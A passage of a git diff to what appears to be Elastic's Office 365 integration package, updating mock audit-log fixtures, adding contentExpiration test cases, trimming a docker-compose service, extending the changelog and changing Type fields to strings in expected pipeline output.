test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"},{"Severity":"Medium","RuleId":"51e3d97a-1234-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"Mid volume of content detected test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"}],"PolicyName":"test","PolicyId":"88956b36-45b3-4828-bf53-78603c0e5f58"}],"ExchangeMetaData":{"From":"asr@testsiem2.onmicrosoft.com","CC":["asr@example.net"],"BCC":[],"To":["asr@example.org"],"FileSize":13405,"UniqueID":"8e103f2f-b293-4062-38b8-08d7b965b2fa","MessageID":"","RecipientCount":2,"Sent":"2020-02-24T20:11:14","Subject":"Here's the phony data"},"UserKey":"1153801116545789462","Operation":"DlpRuleMatch","IncidentId":"c1dc582b-fa61-6020-1800-08d7b966ec64","Id":"d5a0e7d9-e06f-498c-8413-eb83b7dbd516","RecordType":13}, - {"Workload":"Exchange","SensitiveInfoDetectionIsIncluded":false,"ObjectId":"","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","CreationTime":"2020-02-24T20:11:15","UserId":"DlpAgent","UserType":4,"Version":1,"ExceptionInfo":{ "FalsePositive": true },"PolicyDetails":[{"Rules":[{"Severity":"High","RuleId":"51e3d97a-e159-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"High volume of content detected test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"},{"Severity":"Medium","RuleId":"51e3d97a-1234-4645-9092-608bd24e083a","ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"Actions":["BlockAccess","NotifyUser","GenerateIncidentReport"],"RuleName":"Mid volume of content detected test","ActionParameters":["GenerateIncidentReport:asr@testsiem2.onmicrosoft.com"],"RuleMode":"Enable"}],"PolicyName":"test","PolicyId":"88956b36-45b3-4828-bf53-78603c0e5f58"}],"ExchangeMetaData":{"From":"asr@testsiem2.onmicrosoft.com","CC":["asr@example.net"],"BCC":[],"To":["asr@example.org"],"FileSize":13405,"UniqueID":"8e103f2f-b293-4062-38b8-08d7b965b2fa","MessageID":"","RecipientCount":2,"Sent":"2020-02-24T20:11:14","Subject":"Here's the phony data"},"UserKey":"1153801116545789462","Operation":"DlpRuleMatch","IncidentId":"c1dc582b-fa61-6020-1800-08d7b966ec64","Id":"d5a0e7d9-e06f-498c-8413-eb83b7dbd516","RecordType":13}, - {"Workload":"Exchange","SensitiveInfoDetectionIsIncluded":false,"ObjectId":"","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","UserId":"DlpAgent","CreationTime":"2020-02-24T20:11:15","UserType":4,"Version":1,"PolicyDetails":[{"Rules":[{"Severity":"Low","RuleId":"8398c03a-a00d-42bb-8f80-ead0ad04e1df","RuleName":"Low volume of content detected test","Actions":["NotifyUser"],"ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"RuleMode":"Enable"}],"PolicyName":"test","PolicyId":"88956b36-45b3-4828-bf53-78603c0e5f58"}],"ExchangeMetaData":{"From":"asr@testsiem2.onmicrosoft.com","CC":["asr@example.net"],"BCC":[],"To":["asr@example.org"],"FileSize":13310,"UniqueID":"8e103f2f-b293-4062-38b8-08d7b965b2fa","MessageID":"","RecipientCount":2,"Sent":"2020-02-24T20:11:14","Subject":"Here's the phony data"},"UserKey":"1153801116545789462","Operation":"DlpRuleMatch","IncidentId":"c1dc582b-fa61-6020-1800-08d7b966ec64","Id":"a42123a9-1c07-4dde-9be6-ac71cb9fd16b","RecordType":13}, - {"Workload":"Exchange","SensitiveInfoDetectionIsIncluded":false,"ObjectId":"","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","UserId":"DlpAgent","CreationTime":"2020-02-24T20:11:15","UserType":4,"Version":1,"PolicyDetails":[{"Rules":[{"Severity":"Low","RuleId":"8398c03a-a00d-42bb-8f80-ead0ad04e1df","RuleName":"Low volume of content detected test","Actions":["NotifyUser"],"ConditionsMatched":{"OtherConditions":[{"Name":"AccessScope","Value":"IncludeExternalUsers"}],"SensitiveInformation":[{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"419f449f-6d9d-4be1-a154-b531f7a91b41"},{"Count":1,"UniqueCount":1,"Confidence":75,"Location":"Message Body","SensitiveType":"b8fe86d1-c056-453b-bfaa-9fe698699ecc"}]},"RuleMode":"Enable"}],"PolicyName":"test","PolicyId":"88956b36-45b3-4828-bf53-78603c0e5f58"}],"SharePointMetaData":{"From":"alice@testsiem2.onmicrosoft.com","itemCreationTime":"2020-02-20T11:23:45","UniqueID":"8e103f2f-b293-4062-38b8-08d7b965b2fa","FileName":"Company-Internal-Financial.docx","FileOwner":"alice@testsiem2.onmicrosoft.com","FilePathUrl":"https://example.net/testsiem2.onmicrosoft.com/sharepoint","LastModifiedTime":"2020-02-24T12:13:14Z"},"UserKey":"1153801116545789462","Operation":"DlpRuleMatch","IncidentId":"c1dc582b-fa61-6020-1800-08d7b966ec64","Id":"a42123a9-1c07-4dde-9be6-ac71cb9fd16b","RecordType":13} - ] # CEL Input Rules - path: /test-cel-tenant-id/oauth2/v2.0/token methods: [POST] @@ -322,7 +101,7 @@ rules: Content-Type: - "application/json" body: |- - [{"contentType": "Audit.Sharepoint","contentId": "celid2","contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/celsp1/activity/feed/audit/celid2","contentCreated": "{{ .request.vars.endTime }}","contentExpiration": "2199-05-30T17:35:00.000Z"}] + [{"contentType": "Audit.Sharepoint","contentId": "celid2","contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/celsp1/activity/feed/audit/celid2","contentCreated": "{{ .request.vars.endTime }}","contentExpiration": "2199-05-30T17:35:00.000Z"},{"contentType": "Audit.Sharepoint","contentId": "celid2a","contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/celsp1/activity/feed/audit/celid2a","contentCreated": "{{ .request.vars.endTime }}","contentExpiration": "2023-03-30T17:35:00.000Z"},{"contentType": "Audit.Sharepoint","contentId": "celid2b","contentUri": "http://{{ hostname }}:{{ env "PORT" }}/api/v1.0/celsp1/activity/feed/audit/celid2b","contentCreated": "{{ .request.vars.endTime }}","contentExpiration": "2055-04-30T17:35:00.000Z"}] - path: /api/v1.0/celsp1/activity/feed/audit/celid1 methods: [GET] request_headers: @@ -333,6 +112,7 @@ rules: headers: Content-Type: - "application/json" + # 4 documents, but only 2 unique Ids body: |- [{"ListItemUniqueId":"59a8433d-9bb8-cfef-6edc-4c0fc8b86875","ItemType":"Page","Workload":"OneDrive","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-07T16:43:53","Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ClientIP":"213.97.47.133","WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserType":0,"Version":1,"EventSource":"SharePoint","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0","UserKey":"i:0h.f|membership|1003200096971f55@live.com","CustomUniqueId":true,"Operation":"PageViewed","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx","Id":"99d005e6-a4c6-46fd-117c-08d7abeceab5","CorrelationId":"622b339f-4000-a000-f25f-92b3478c7a25","RecordType":4},{"UserId":"asr@testsiem.onmicrosoft.com","ListItemUniqueId":"59a8433d-9bb8-cfef-6edc-4c0fc8b86875","RecordType":4,"ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx","Workload":"OneDrive","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserType":0,"CreationTime":"2020-02-07T16:43:53","Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ClientIP":"213.97.47.133","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0","Version":1,"EventSource":"SharePoint","CustomUniqueId":true,"UserKey":"i:0h.f|membership|1003200096971f55@live.com","Operation":"PageViewed","Id":"99d005e6-a4c6-46fd-117c-08d7abeceab5","CorrelationId":"622b339f-4000-a000-f25f-92b3478c7a25","ItemType":"Page"},{"Workload":"OneDrive","Version":1,"RecordType":4,"ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-07T16:43:53","Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","Id":"99d005e6-a4c6-46fd-117c-08d7abeceab5","WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserType":0,"ListItemUniqueId":"59a8433d-9bb8-cfef-6edc-4c0fc8b86875","EventSource":"SharePoint","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0","UserKey":"i:0h.f|membership|1003200096971f55@live.com","CustomUniqueId":true,"ClientIP":"213.97.47.133","Operation":"PageViewed","CorrelationId":"622b339f-4000-a000-f25f-92b3478c7a25","ItemType":"Page"},{"SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","CreationTime":"2020-02-07T16:44:23","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","Version":1,"SourceRelativeUrl":"Documents","RecordType":6,"UserId":"asr@testsiem.onmicrosoft.com","SourceFileExtension":"png","UserType":0,"EventSource":"SharePoint","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ClientIP":"213.97.47.133","CorrelationId":"692b339f-902e-a000-f25f-95def5f17903","Workload":"OneDrive","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","SourceFileName":"Screenshot.png","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0","ItemType":"File","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","Operation":"FileModified","Id":"5b02fadb-8eac-4aff-af87-08d7abecfca3"}] - path: /api/v1.0/celsp1/activity/feed/audit/celid2 @@ -345,8 +125,35 @@ rules: headers: Content-Type: - "application/json" + # 2 documents body: |- [{"SourceRelativeUrl":"Documents","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","CreationTime":"2020-02-07T16:44:07","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","Version":1,"RecordType":6,"UserId":"asr@testsiem.onmicrosoft.com","SourceFileExtension":"png","UserType":0,"EventSource":"SharePoint","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0","ClientIP":"213.97.47.133","CorrelationId":"652b339f-908c-a000-f25f-91423da7dd9b","Workload":"OneDrive","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png","WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/","SourceFileName":"Screenshot 2020-01-27 at 11.30.48.png","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","ListItemUniqueId":"4803608a-df7d-4f63-aa73-67aa33bb576e","Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","Operation":"FileDeleted","Id":"ec04aa09-0a43-4879-cdc8-08d7abecf327"},{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ItemType":"File","UserKey":"i:0h.f|membership|1003200096971f55@live.com","TargetUserOrGroupName":"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"System.LimitedEdit","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png","SourceFileName":"Screenshot.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"79.159.10.151","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot.png","EventSource":"SharePoint","TargetUserOrGroupType":"SecurityGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"98633e47-3540-4e8a-bcfc-08d7b17b4e48","UserType":0}] + # contentExpiration < now. This shouldn't run. + - path: /api/v1.0/celsp1/activity/feed/audit/celid2a + methods: [GET] + request_headers: + Authorization: + - "Bearer CELtoken" + responses: + - status_code: 200 + headers: + Content-Type: + - "application/json" + body: |- + [{"SourceRelativeUrl":"Documents","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","CreationTime":"2020-02-07T16:44:07","ListId":"2b6ad2be-0ed7-4556-9c89-a97847085b85","Version":1,"RecordType":6,"UserId":"asr@testsiem.onmicrosoft.com","SourceFileExtension":"png","UserType":0,"EventSource":"SharePoint","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0","ClientIP":"213.97.47.133","CorrelationId":"652b339f-908c-a000-f25f-91423da7dd9b","Workload":"OneDrive","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 12.30.48.png","WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/","SourceFileName":"Screenshot 2020-01-27 at 112.30.48.png","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","ListItemUniqueId":"4803608a-df7d-4f63-aa73-67aa33bb576e","Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","Operation":"FileDeleted","Id":"dc04aa19-0b43-4879-cdc8-08d7abecf327"},{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ItemType":"File","UserKey":"i:0h.f|membership|1003200096971f55@live.com","TargetUserOrGroupName":"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"System.LimitedEdit","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot1234.png","SourceFileName":"Screenshot1234.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"79.159.10.151","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot1234.png","EventSource":"SharePoint","TargetUserOrGroupType":"SecurityGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"90633f47-2540-4e8a-bcfc-08d7b17b4e48","UserType":0}] + - path: /api/v1.0/celsp1/activity/feed/audit/celid2b + methods: [GET] + request_headers: + Authorization: + - "Bearer CELtoken" + responses: + - status_code: 200 + headers: + Content-Type: + - "application/json" + # 2 documents + body: |- + [{"SourceRelativeUrl":"Documents","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","CreationTime":"2020-02-07T16:44:07","ListId":"2b6ad2be-0ed7-4556-9c89-a97847085b85","Version":1,"RecordType":6,"UserId":"asr@testsiem.onmicrosoft.com","SourceFileExtension":"png","UserType":0,"EventSource":"SharePoint","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0","ClientIP":"213.97.47.133","CorrelationId":"652b339f-908c-a000-f25f-91423da7dd9b","Workload":"OneDrive","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 12.30.48.png","WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/","SourceFileName":"Screenshot 2020-01-27 at 112.30.48.png","UserKey":"i:0h.f|membership|1003200096971f55@live.com","ItemType":"File","ListItemUniqueId":"4803608a-df7d-4f63-aa73-67aa33bb576e","Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","Operation":"FileDeleted","Id":"dc04ab19-0b43-4g79-cdc8-08d7abecf317"},{"Site":"d5180cfc-3479-44d6-b410-8c985ac894e3","ItemType":"File","UserKey":"i:0h.f|membership|1003200096971f55@live.com","TargetUserOrGroupName":"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd","OrganizationId":"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd","Operation":"SharingSet","EventData":"System.LimitedEdit","ListId":"2b6ad2bd-0fd7-4556-9c89-a97847085b85","RecordType":14,"Version":1,"WebId":"8c5c94bb-8396-470c-87d7-8999f440cd30","UserAgent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0","CorrelationId":"fe71359f-005f-9000-7cb1-ccf5124703db","ListItemUniqueId":"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8","ObjectId":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot1234.png","SourceFileName":"Screenshot1234.png","SiteUrl":"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com","ClientIP":"79.159.10.151","SourceFileExtension":"png","Workload":"OneDrive","SourceRelativeUrl":"Documents/Screenshot1234.png","EventSource":"SharePoint","TargetUserOrGroupType":"SecurityGroup","UserId":"asr@testsiem.onmicrosoft.com","CreationTime":"2020-02-14T18:25:44","Id":"90633f47-25f0-4e8a-bcfc-08d7b17b4e60","UserType":0}] - path: /api/v1.0/test-cel-tenant-id/activity/feed/subscriptions/content methods: [GET] query_params: @@ -374,5 +181,6 @@ rules: headers: Content-Type: - "application/json" + # 2 documents body: |- [{"ObjectId":"Sales","Id":"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594","CreationTime":"2020-02-28T09:42:45","UserKey":"100320009d6edf94","YammerNetworkId":5846122497,"Operation":"GroupCreation","ClientIP":"79.159.10.151:12345","ActorYammerUserId":36787265537,"UserType":0,"ResultStatus":"TRUE","RecordType":22,"Workload":"Yammer","Version":1,"GroupName":"Sales","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","UserId":"alice@testsiem2.onmicrosoft.com","ActorUserId":"alice@testsiem2.onmicrosoft.com"},{"CreationTime":"2020-02-28T09:39:20","ActorUserId":"asr@testsiem2.onmicrosoft.com","ObjectId":"Company group","UserKey":"100320009d292e16","Id":"3f3e7f1c-84c1-55fc-9bb2-c8b8563eae06","ActorYammerUserId":36085768193,"ClientIP":"[fdfd::555]:12346","UserId":"asr@testsiem2.onmicrosoft.com","Operation":"GroupCreation","ResultStatus":"TRUE","UserType":0,"Workload":"Yammer","Version":1,"OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","YammerNetworkId":5846122497,"RecordType":22,"GroupName":"Company group"}] diff --git a/packages/o365/_dev/deploy/docker/docker-compose.yml b/packages/o365/_dev/deploy/docker/docker-compose.yml index f2161671934..5a377a8e92e 100644 --- a/packages/o365/_dev/deploy/docker/docker-compose.yml +++ b/packages/o365/_dev/deploy/docker/docker-compose.yml @@ -1,17 +1,5 @@ version: '2.3' services: - o365: - image: docker.elastic.co/observability/stream:v0.5.0 - ports: - - 8080 - environment: - PORT: "8080" - volumes: - - ./config.yml:/config.yml - command: - - http-server - - --addr=:8080 - - --config=/config.yml o365-cel: image: docker.elastic.co/observability/stream:v0.5.0 ports: diff --git a/packages/o365/changelog.yml b/packages/o365/changelog.yml index 604c127ebbb..4337c3e3365 100644 --- a/packages/o365/changelog.yml +++ b/packages/o365/changelog.yml @@ -1,4 +1,29 @@ # newer versions go on top +- version: "2.3.2" + changes: + - description: Improve handling of o365.audit.OperationProperties. + type: bugfix + link: https://github.com/elastic/integrations/pull/9493 +- version: "2.3.1" + changes: + - description: Check contentExpiration timestamp before requesting contents. + type: bugfix + link: https://github.com/elastic/integrations/pull/9477 +- version: "2.3.0" + changes: + - description: Set sensitive values as secret and fix incorrect mappings. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 +- version: "2.2.2" + changes: + - description: Fix dashboard panel filters + type: bugfix + link: https://github.com/elastic/integrations/pull/8983 +- version: "2.2.1" + changes: + - description: Prevent tenant ID being rendered into debug logs. + type: bugfix + link: https://github.com/elastic/integrations/pull/9017 - version: "2.2.0" changes: - description: Expose OAuth2 token scopes configuration value. diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json index 75fafaec42b..258816ba7ab 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-events.json-expected.json @@ -36,27 +36,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -120,19 +120,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -218,27 +218,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -302,19 +302,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -400,27 +400,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -484,19 +484,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -582,27 +582,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -667,27 +667,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -773,27 +773,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -858,27 +858,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", 